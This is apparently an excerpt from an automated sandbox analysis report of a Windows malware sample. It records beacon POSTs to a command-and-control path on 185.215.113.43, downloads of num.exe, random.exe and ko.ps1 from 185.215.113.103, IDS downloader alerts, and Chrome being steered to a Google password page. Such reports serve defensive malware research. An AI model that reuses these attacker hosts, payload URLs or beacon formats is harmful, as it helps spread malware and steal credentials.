Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49706 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 185.215.113.103:80
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.103
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006AAA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA, 0_2_006AAA09
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=AkfybAvKZ32l69F&MD=OShox1r7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1Host: youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpbbJAQipncoBCJuDywEIkqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1Host: www.youtube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpbbJAQipncoBCJuDywEIkqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKCjSWa8TD5HR0ssoNSHmv1DlGbxavvv4f4_vreCQV6o4JdgbhTns13WqVLfraA3idGD1YqVFdL1d29hUkKmBRQxeBB8OW5ZEZvDIDLLC0_H7OAK-03clOTMdE15SKgAxlKa5Za-otUDEb42n7phqLA20ygc_Y63/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_9_1_1.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /webstore/inlineinstall/detail/efaidnbmnnnibpcajpcglclefindmkaj HTTP/1.1Host: chrome.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-640975673&timestamp=1727682697731 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpbbJAQipncoBCJuDywEIkqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpbbJAQipncoBCJuDywEIkqHLAQiFoM0BCLnKzQEI+cDUFQ==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=onpa3VdrJ_93kLczbw354ezLC3v-GLWmYGiB2yuyMtOBxB-hFS4OPqg8aBa9WWOizC-jGHdFJeucim9hbU8sam55vSuP7cGZP7dlzOMzB5Y833IYVqpUrU_teDSXFS1emefo72UGTcXCk7eyLIYgpNA0pE7ymQwQmx5hh8hGcMZ_bfm9YA
Source: global traffic HTTP traffic detected: GET /crx/blobs/AY4GWKDHKllS27BO_e8bCnbax_jg8ytdTG4Uzua5Kte91Msonmjt9Ssh1u4j53F3UYy-997sHknkzKEy9994XId3zBBDiju_YSunzv5QYwyL8XEx9VuF26n3JIgkmCYaLzIAxlKa5UdUDZoPCHdwU63c7rFT0JUxfsWG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_82_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=AkfybAvKZ32l69F&MD=OShox1r7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/ko.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9g equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4519237628.00003FCC02360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd%2Fchallenge%2Fpwd3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2373419811.00003FCC03108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 6s://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0eport/fine-allowlist equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4519274085.00003FCC0236C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 7Vaccounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&ifkv=ARpgrqfTFQ5fRi6WSPK3XwJYXYrA9P91T_X4FTyncFXGII6LppQEht4ktLrRCxCe5IDqRrKwnKTJ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1507457055%3A1727682692218469&ddm=0- equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2511037745.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.4246852367.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.3002893869.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?F%2Fwww.youtube.com%2Fsgnin%3Fom%252Fant%2s%25 ZA equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2511037745.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.4246852367.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.3002893869.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?F%2Fwww.youtube.com%2Fsgnin%3Fom%252Fant%2s%25 equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4518934007.00003FCC022DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?tion_handle_signin=true&app=desktop&hl=en&next=https://www.youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd&feature=redirect_login&hl=en equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000002.4519640603.00003FCC023D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2511037745.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.4246852367.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.3002893869.00003FCC03B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: F%2Fwww.youtube.com%2Fs equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358387820.00003FCC0355C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: GETbhttps://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2358297327.00003FCC0371C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 200 OKContent-Type: text/html; charset=utf-8X-Frame-Options: DENYx-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%25253F%25253Dhttps%2525253A%2525252F%2525252Faccounts.google.com%2525252Fv3%2525252Fsignin%2525252Fchallenge%2525252Fpwd%2526feature%253Dredirect_loginx-ua-compatible: IE=edgeCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:51:33 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-ti1ryhgws_-LMzI-TQBa8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en._s1fC-CLCMs.es5.O/ https://apis.google.com/_/scs/abc-static/_/js/;report-uri /v3/signin/_/AccountsSignInUi/cspreport/fine-allowlistReport-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Resource-Policy: same-sitePermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-u
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 301 Moved PermanentlyContent-Type: application/binaryX-Content-Type-Options: nosniffExpires: Mon, 30 Sep 2024 07:51:28 GMTDate: Mon, 30 Sep 2024 07:51:28 GMTCache-Control: private, max-age=31536000Location: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2FpwdX-Frame-Options: SAMEORIGINReport-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"Content-Security-Policy: require-trusted-types-for 'script'Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionVary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFContent-Length: 0X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.2347060438.00003FCC034DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HTTP/1.1 302 FoundContent-Type: application/binaryCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:51:31 GMTLocation: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%253F%253Dhttps%25253A%25252F%25252Faccounts.google.com%25252Fv3%25252Fsignin%25252Fchallenge%25252Fpwd%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARpgrqeCXuozKuNgg6MX9Rq-hQWwPVQwL_ack-uT_7RprktA3kMD0CQY1YwpoLJKsHwkgx7ee0Fz9gPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 